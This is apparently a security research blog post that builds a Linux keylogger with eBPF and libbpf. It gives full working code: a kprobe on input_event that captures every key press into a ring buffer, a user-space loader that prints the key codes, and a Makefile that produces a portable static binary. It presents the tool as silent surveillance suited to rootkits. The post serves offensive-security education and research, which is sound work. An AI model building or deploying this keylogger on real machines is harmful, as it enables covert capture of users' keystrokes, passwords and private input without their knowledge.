Offensive eBPF - Building a Keylogger with libbpf

Feb 5, 2026 by Zacharia Mansouri

Linux Offensive Security eBPF

https://cylab.be/blog/482/offensive-ebpf-building-a-keylogger-with-libbpf

Sophisticated surveillance tools do not always need to break the system. Often, they simply use it exactly as intended. Imagine a single, lightweight binary capable of running on many Linux servers regardless of the underlying kernel version. It silently captures every keystroke without requiring a compiler on the target or loading visible kernel modules. In a previous blog post, we explored this concept using a simple bpftrace script. In this one, we will take that logic and port it to libbpf. This allows us to move away from runtime dependencies and build a standalone C application that leverages Ring Buffers for efficient event processing.


In a previous blog post, we used bpftrace to rapidly prototype a keylogger. While bpftrace is excellent for one-liners and quick investigations, it relies on the LLVM backend to compile scripts at runtime, which adds startup latency and requires heavy dependencies on the target machine. For building robust, production-grade security tools (or rootkits), we need to move to libbpf, the modern standard for eBPF development. It allows us to write Compile Once - Run Everywhere (CO-RE) applications: lightweight, pre-compiled binaries that start quickly. In this post, we will port our keylogger logic from a script to a full-fledged C application using libbpf and Ring Buffers for high-performance data exfiltration.

The Mechanism: Ring Buffers and CO-RE

The older way of writing BPF tools, using the BCC framework, embedded Clang/LLVM (typically driven from Python) to compile the C code on the target at load time, which in practice required kernel headers and a compiler toolchain on every machine. libbpf avoids this with CO-RE, which gives us:

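  • Portability: We use a single header, vmlinux.h, generated from the kernel’s BTF type information. It contains the kernel’s type definitions, and libbpf uses the same BTF data at load time to adjust the program to the layout of the running kernel.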
  • Efficiency: The BPF program is compiled ahead of time into an object file.
  • Modern Maps: We replace older methods with BPF Ring Buffers, a shared memory region that allows the kernel to push data to user space with minimal overhead.
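To make the ring buffer idea concrete, here is a minimal user-space model of a single-producer, single-consumer ring. It is only a sketch: the names (toy_ring, toy_produce, toy_consume) are hypothetical, and the real BPF ring buffer additionally deals with record headers, memory mapping, and concurrent producers. What the model shares with the real thing is the power-of-two size, the separate producer and consumer positions, and the fact that a full buffer rejects new records instead of overwriting old ones.

```c
#include <stddef.h>
#include <stdint.h>

#define TOY_RING_SIZE 64u /* must be a power of two, like max_entries */

/* Hypothetical toy model, not the kernel's data structure. */
struct toy_ring {
    uint8_t  data[TOY_RING_SIZE];
    uint64_t producer_pos; /* total bytes ever written */
    uint64_t consumer_pos; /* total bytes ever read */
};

/* Producer side: copy one record in, or return -1 if it does not fit.
 * This mirrors bpf_ringbuf_reserve() returning NULL on a full buffer. */
int toy_produce(struct toy_ring *r, const void *rec, size_t len)
{
    uint64_t used = r->producer_pos - r->consumer_pos;
    const uint8_t *src = rec;

    if (len > TOY_RING_SIZE - used)
        return -1; /* full: the new record is dropped */

    for (size_t i = 0; i < len; i++)
        r->data[(r->producer_pos + i) & (TOY_RING_SIZE - 1)] = src[i];
    r->producer_pos += len; /* "submit": the record becomes visible */
    return 0;
}

/* Consumer side: copy one record out, or return -1 if nothing is pending. */
int toy_consume(struct toy_ring *r, void *out, size_t len)
{
    uint8_t *dst = out;

    if (r->producer_pos - r->consumer_pos < len)
        return -1;

    for (size_t i = 0; i < len; i++)
        dst[i] = r->data[(r->consumer_pos + i) & (TOY_RING_SIZE - 1)];
    r->consumer_pos += len; /* free the space for the producer */
    return 0;
}
```

Because the positions only ever grow and are masked on access, wrapping around the end of the array needs no special case.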

Part 1: The Kernel Payload (program.bpf.c)

This file runs inside the kernel. Its only job is to hook the input_event function, filter for key presses, and push the data into a Ring Buffer.

The Setup and Constants

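First, we define our environment. Notice we don’t include <linux/sched.h> or other kernel-internal headers. Instead, we include "vmlinux.h". This single file is generated by bpftool from the running kernel’s BTF data and contains definitions for the kernel’s structs, unions, enums, and typedefs. It does not carry preprocessor macros, which is why EV_KEY comes from <linux/input-event-codes.h>.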

We also define the structure of the data we want to export: the timestamp (ts) and the key code (code).

#include "vmlinux.h" // kernel types (__u64, struct pt_regs, enum bpf_map_type, ...)

#define __TARGET_ARCH_x86 // selects the x86 register layout for PT_REGS_PARMx

#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h> // for PT_REGS_PARMx
#include <linux/input-event-codes.h> // macros only (EV_KEY), so safe next to vmlinux.h

struct key_event_t {
    __u64 ts;
    __u32 code;
};

char LICENSE[] SEC("license") = "GPL";

Defining the Ring Buffer

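We define a map called events of type BPF_MAP_TYPE_RINGBUF. This acts as a circular queue: the kernel program is the producer and appends records, while our user-space app is the consumer and reads them in the same order. For this map type, max_entries is the buffer size in bytes and must be a power of two and a multiple of the page size. We allocate a generous 16 MB (1 << 24), far more than keystrokes need, so that events are dropped only if the consumer stalls for a very long time. When the buffer is full, bpf_ringbuf_reserve() returns NULL and the event is lost.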

struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 1 << 24); // 16MB
} events SEC(".maps");
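As a rough sanity check on that sizing, the arithmetic below estimates how many key events fit into the buffer. It assumes an 8-byte header per record and record lengths rounded up to a multiple of 8 bytes, which is our understanding of the kernel’s ring buffer layout and should be treated as an assumption. ringbuf_capacity and round_up_8 are hypothetical helpers, not libbpf functions.

```c
#include <stddef.h>

#define RECORD_HDR_SZ 8u /* assumed per-record header size in bytes */

/* Round n up to the next multiple of 8. */
size_t round_up_8(size_t n)
{
    return (n + 7u) & ~(size_t)7u;
}

/* Approximate number of records with payload_sz bytes of payload
 * that fit into a ring buffer of ring_sz bytes. */
size_t ringbuf_capacity(size_t ring_sz, size_t payload_sz)
{
    return ring_sz / round_up_8(RECORD_HDR_SZ + payload_sz);
}
```

With a 16-byte payload (the size of key_event_t on x86-64, including padding) and a 16 MB buffer, ringbuf_capacity((size_t)1 << 24, 16) comes to 699050 records, so the consumer would have to fall several hundred thousand key presses behind before anything is dropped.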

The Hook: Capturing the Input

We attach our function to kprobe/input_event. As in the bpftrace script from our previous blog post, we need to access the function’s arguments. In compiled C, however, we use architecture-specific macros (PT_REGS_PARM2, etc.) to read the CPU registers where the arguments are stored:

  • PARM1 (dev): A pointer to the struct input_dev that generated the event (we won’t use it here).
  • PARM2 (type): The event type; we compare it against EV_KEY to keep only key events.
  • PARM3 (code): The code of the key involved.
  • PARM4 (value): The key state (0 = released, 1 = pressed, 2 = autorepeat).

SEC("kprobe/input_event")
int trace_input_event(struct pt_regs *ctx)
{
    __u32 type = PT_REGS_PARM2(ctx);
    __u32 code = PT_REGS_PARM3(ctx);
    __s32 value = PT_REGS_PARM4(ctx);

    // Filter: We only want key presses (value == 1) of type EV_KEY
    if (type == EV_KEY && value == 1) {
        struct key_event_t *data;

        // Reserve space in the Ring Buffer
        data = bpf_ringbuf_reserve(&events, sizeof(*data), 0);
        if (!data)
            return 0;

        // Populate the data
        data->ts = bpf_ktime_get_ns();
        data->code = code;

        // Commit (Submit) the data to user space
        bpf_ringbuf_submit(data, 0);
    }

    return 0;
}

Part 2: The Agent (program.c)

The user-space component loads the BPF program and “consumes” the events from the ring buffer. Among the included headers, program.skel.h is an auto-generated header file that creates a C struct representing our BPF program. It handles all the low-level work of creating maps, loading bytecode, and attaching probes. This reduces hundreds of lines of boilerplate code into just open, load, and attach.

The Callback Function

libbpf calls this function once for every record it consumes from the ring buffer during ring_buffer__poll(). It simply casts the raw memory to our key_event_t struct and prints it.

#include <stdio.h>
#include <bpf/libbpf.h>
#include <bpf/bpf.h> // to avoid implicit declaration of functions such as bpf_map_update_elem()
#include "program.skel.h"

struct key_event_t { 
    __u64 ts; 
    __u32 code; 
}; 

static int handle_event(void *ctx, void *data, size_t len) {
    struct key_event_t *event = data;
    printf("Key code: %u at time %llu\n", event->code, event->ts);
    return 0;
}
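Since the callback receives raw bytes, a slightly more defensive variant checks the record length before interpreting it. The sketch below is one way we might harden it, not something libbpf requires. It uses <stdint.h> types so that it compiles without the kernel headers, and parse_key_event is a hypothetical helper name.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Same field layout as the struct written by the BPF program. */
struct key_event_t {
    uint64_t ts;
    uint32_t code;
};

/* Copy a raw ring buffer record into *out.
 * Returns 0 on success, -1 if the record is missing or too short. */
int parse_key_event(const void *data, size_t len, struct key_event_t *out)
{
    if (data == NULL || out == NULL || len < sizeof(*out))
        return -1;

    /* memcpy avoids any assumption about the alignment of data */
    memcpy(out, data, sizeof(*out));
    return 0;
}
```

Inside handle_event, we would call parse_key_event(data, len, &ev) first and simply return 0 to skip the record if it fails.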

Loading and Attaching

Inside the main function, we manage the program’s lifecycle. program_bpf__open_and_load() is a convenience function that opens the embedded BPF object, creates its maps, and loads the bytecode into the kernel, where the verifier checks it. program_bpf__attach() then attaches the program to its kprobe.

int main(void) {
    struct program_bpf *skel = program_bpf__open_and_load();
    if (!skel) {
        fprintf(stderr, "Failed to load skeleton\n");
        return 1;
    }

    if (program_bpf__attach(skel)) {
        fprintf(stderr, "Failed to attach BPF program\n");
        program_bpf__destroy(skel); // release the loaded program and maps
        return 1;
    }

The Polling Loop

Finally, we set up the ring buffer manager. We link it to the file descriptor of our events map and pass our handle_event callback. The while loop essentially puts the program to sleep until the kernel wakes it up with new data.

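    struct ring_buffer *rb = ring_buffer__new(bpf_map__fd(skel->maps.events), handle_event, NULL, NULL);
    if (!rb) {
        fprintf(stderr, "Failed to create ring buffer\n");
        program_bpf__destroy(skel);
        return 1;
    }

    while (1) {
        // Blocks until an event arrives; a negative return means polling failed
        if (ring_buffer__poll(rb, -1) < 0)
            break;
    }

    ring_buffer__free(rb);
    program_bpf__destroy(skel);
    return 0;
}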
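If we want the agent to stop cleanly on Ctrl-C, a common pattern is a signal handler that sets a flag checked by the polling loop. The sketch below shows that pattern in isolation. To keep it compilable without libbpf, the poll call is passed in as a function pointer; poll_fn_t, run_until_stopped, and demo_poll are hypothetical names, and demo_poll merely stands in for a call such as ring_buffer__poll(rb, timeout_ms).

```c
#include <signal.h>

/* Set from the signal handler, read by the loop. */
static volatile sig_atomic_t stop_requested;

static void on_signal(int signo)
{
    (void)signo;
    stop_requested = 1;
}

/* Stand-in for the real poll call: negative on error, >= 0 otherwise. */
typedef int (*poll_fn_t)(void *ctx);

/* Poll until a signal asks us to stop or poll_fn reports an error.
 * Returns the number of poll calls that completed successfully. */
int run_until_stopped(poll_fn_t poll_fn, void *ctx)
{
    int iterations = 0;

    signal(SIGINT, on_signal);
    signal(SIGTERM, on_signal);

    while (!stop_requested) {
        if (poll_fn(ctx) < 0)
            break;
        iterations++;
    }
    return iterations;
}

/* Demonstration only: counts calls and simulates Ctrl-C on the third one. */
int demo_poll(void *ctx)
{
    int *calls = ctx;

    if (++*calls == 3)
        raise(SIGINT);
    return 0;
}
```

With a real ring buffer, a finite timeout (for example 100 ms instead of -1) lets the loop re-check the flag regularly, after which the cleanup calls at the end of main run as intended.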

Testing with a Virtual Input

If you are developing this on a headless server or a VM, you might not have a physical keyboard attached. In order to verify that the tool works, we can simulate hardware input events using a program called input-emulator.

  1. Install the emulator

sudo apt install meson # If not installed already (other dependencies might be missing)
git clone https://github.com/tio/input-emulator
cd input-emulator
meson build
meson compile -C build
sudo meson install -C build

  2. Run the eBPF program

Launch the compiled binary in your first terminal:

sudo ./program

  3. Simulate keystrokes

In a second terminal, spin up the virtual keyboard and type the letter 'a':

sudo input-emulator start kbd # Start virtual keyboard
sudo input-emulator kbd key a # Press a virtual key

The agent will output:

Key code: 30 at time 17356892
...
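The number 30 is the Linux key code KEY_A from <linux/input-event-codes.h>. To make the output easier to read, the agent could translate codes into names. Below is a minimal sketch with a partial table for a US layout; key_names and key_name are hypothetical names, the table covers only a subset of keys, and it does not track modifiers such as Shift.

```c
#include <stddef.h>

/* Partial table indexed by Linux key code (KEY_* values).
 * Entries that are not listed stay NULL. */
static const char *const key_names[] = {
    [1]  = "ESC",
    [2]  = "1", [3]  = "2", [4]  = "3", [5]  = "4", [6]  = "5",
    [7]  = "6", [8]  = "7", [9]  = "8", [10] = "9", [11] = "0",
    [14] = "BACKSPACE", [15] = "TAB",
    [16] = "Q", [17] = "W", [18] = "E", [19] = "R", [20] = "T",
    [21] = "Y", [22] = "U", [23] = "I", [24] = "O", [25] = "P",
    [28] = "ENTER",
    [30] = "A", [31] = "S", [32] = "D", [33] = "F", [34] = "G",
    [35] = "H", [36] = "J", [37] = "K", [38] = "L",
    [42] = "LEFTSHIFT",
    [44] = "Z", [45] = "X", [46] = "C", [47] = "V", [48] = "B",
    [49] = "N", [50] = "M",
    [57] = "SPACE",
};

/* Return a printable name for a key code, or "UNKNOWN" if unmapped. */
const char *key_name(unsigned int code)
{
    size_t n = sizeof(key_names) / sizeof(key_names[0]);

    if (code < n && key_names[code] != NULL)
        return key_names[code];
    return "UNKNOWN";
}
```

In handle_event, printing key_name(event->code) alongside the numeric code would turn the sample line above into something like "Key code: 30 (A)". Keep in mind that key codes identify physical keys, so the mapping to characters depends on the keyboard layout in use.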

Full Code

To keep the project structure clean and standardized, this code follows the pattern outlined in the eBPF CO-RE guide. This ensures we are using modern CO-RE best practices, separating the kernel logic, the user-space controller, and the build system into distinct, manageable components.

Below is the complete source code for the project.

The Kernel Payload (program.bpf.c)

#include "vmlinux.h" // CO-RE types (do not mix with other kernel type headers)

#define __TARGET_ARCH_x86 // selects the x86 register layout for PT_REGS_PARMx

#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
#include <linux/input-event-codes.h> // Macros only, such as EV_KEY

struct key_event_t {
    __u64 ts;
    __u32 code;
};

// Ring buffer for user-space events (16MB)
struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 1 << 24);
} events SEC(".maps");

// Hook: void input_event(struct input_dev *dev, unsigned int type, unsigned int code, int value)
SEC("kprobe/input_event")
int trace_input_event(struct pt_regs *ctx)
{
    __u32 type  = PT_REGS_PARM2(ctx); // arg2: type
    __u32 code  = PT_REGS_PARM3(ctx); // arg3: key code
    __s32 value = PT_REGS_PARM4(ctx); // arg4: state (0=up, 1=down, 2=autorepeat)

    // Filter: We only want key presses (value == 1) of type EV_KEY
    if (type == EV_KEY && value == 1) {
        struct key_event_t *data;

        // Reserve space in the Ring Buffer
        data = bpf_ringbuf_reserve(&events, sizeof(*data), 0);
        if (!data)
            return 0;

        // Populate the data
        data->ts = bpf_ktime_get_ns();
        data->code = code;

        // Commit (Submit) the data to user space
        bpf_ringbuf_submit(data, 0);
    }

    return 0;
}

char LICENSE[] SEC("license") = "GPL";

The User Code (program.c)

#include <stdio.h>
#include <bpf/libbpf.h>
#include <bpf/bpf.h> 
#include "program.skel.h" // Auto-generated header via bpftool

// Matches memory layout of struct in kernel code
struct key_event_t {
    __u64 ts;
    __u32 code;
};

// Callback triggered when data arrives from the kernel
static int handle_event(void *ctx, void *data, size_t len) {
    struct key_event_t *event = data; // Cast raw bytes to event struct
    printf("Key code: %u at time %llu\n", event->code, event->ts);
    return 0;
}

int main(void) {
    // Open the BPF object, create its maps, and load the bytecode
    struct program_bpf *skel = program_bpf__open_and_load();
    if (!skel) {
        fprintf(stderr, "Failed to load skeleton\n");
        return 1;
    }

    // Attach bpf program to kernel hooks
    if (program_bpf__attach(skel)) {
        fprintf(stderr, "Failed to attach BPF program\n");
        program_bpf__destroy(skel);
        return 1;
    }

    // Configure the ring buffer consumer with a callback
    struct ring_buffer *rb = ring_buffer__new(bpf_map__fd(skel->maps.events), handle_event, NULL, NULL);
    if (!rb) {
        fprintf(stderr, "Failed to create ring buffer\n");
        program_bpf__destroy(skel);
        return 1;
    }

    while (1) {
        // Block until an event occurs; stop if polling fails
        if (ring_buffer__poll(rb, -1) < 0)
            break;
    }

    // Free the resources
    ring_buffer__free(rb);
    program_bpf__destroy(skel);
    return 0;
}

Build System (Makefile)

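To build this, simply run make. It handles generating vmlinux.h, compiling the BPF code to bytecode, generating the skeleton header, and linking the final binary. The Makefile assumes that libbpf has been built locally with its output under ./libbpf/build, and that clang, bpftool, and static versions of libelf and zlib are installed.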

# Compiler settings
BPF_CLANG=clang

# Kernel side flags
BPF_CFLAGS=-g -O2 -target bpf

# Userspace side flags
# FIX: Added -std=gnu99 to prevent C23 symbol issues (like __isoc23_strtoull)
USER_CFLAGS=-g -O2 -std=gnu99

# --- LIBBPF CONFIG ---
# Point to the library we built locally
LIBBPF_DIR = ./libbpf/build
LIBBPF_OBJ = $(LIBBPF_DIR)/libbpf.a

# Include the headers we installed into libbpf/build/usr/include
# We also include uapi for kernel definitions if needed
INCLUDES = -I$(LIBBPF_DIR)/usr/include -I./libbpf/include/uapi

# Link Statically: Bundles libbpf into the binary
STATIC_LDFLAGS = -static -Wl,--whole-archive $(LIBBPF_OBJ) -Wl,--no-whole-archive -lelf -lz

# Project Name
NAME=program
BPFOBJ=$(NAME).bpf.o
SKELETON=$(NAME).skel.h
EXEC=$(NAME)

# --- TARGETS ---

# Build User-Space Executable
$(EXEC): $(SKELETON) $(NAME).c
	$(BPF_CLANG) $(USER_CFLAGS) $(INCLUDES) $(NAME).c $(STATIC_LDFLAGS) -o $(EXEC)

# Build BPF Kernel Object
$(BPFOBJ): $(NAME).bpf.c vmlinux.h
	$(BPF_CLANG) $(BPF_CFLAGS) $(INCLUDES) -c $(NAME).bpf.c -o $(BPFOBJ)

# Generate vmlinux.h (The "All-in-One" Kernel Header)
vmlinux.h:
	bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

# Generate Skeleton Header (Bridge between Kernel and User)
$(SKELETON): $(BPFOBJ)
	bpftool gen skeleton $(BPFOBJ) > $(SKELETON)

clean:
	- rm -f *.o *.skel.h vmlinux.h $(EXEC)

Conclusion

Moving from a script-based workflow to a compiled one is a real step up. libbpf and Ring Buffers give us a tool that avoids bpftrace’s runtime compilation cost, stays within the verifier’s safety rails, and runs on other machines with compatible kernels without dragging along heavy dependencies.


This blog post is licensed under CC BY-SA 4.0
